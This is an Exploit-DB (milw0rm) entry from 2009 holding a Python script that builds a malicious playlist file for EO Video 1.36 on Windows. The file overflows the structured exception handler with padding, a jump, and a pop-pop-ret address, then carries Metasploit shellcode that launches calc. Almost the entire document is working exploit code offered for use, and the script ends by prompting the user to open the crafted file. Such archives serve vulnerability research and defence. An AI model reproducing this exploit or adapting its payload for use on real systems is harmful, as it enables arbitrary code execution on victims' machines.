EO Video 1.36 - Playlist Overwrite (SEH)

EDB-ID:

8176

Author:

His0k4

Type:

local

Platform:

Windows

Published:

2009-03-09

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "\x41" * 1356

next_seh = "\xEB\x06\x41\x41"

seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm

header1= (																		
	"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
	"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
	"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
	"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
	"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
	"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
	"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
	"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
	"\x0A\x3C\x4E\x61\x6D\x65\x3E")
	
header2= (
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
	"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
	"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
	"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
	"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
	"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
	"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
	"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
	"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
	"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
	"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
	"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")
	

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
	"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
	"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
	"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
	"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
	"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
	"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
	"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
	"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
	"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
    )

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
    out_file = open("exploit.eop",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!\nNow Open it :)"
except:
    print "Error"

# milw0rm.com [2009-03-09]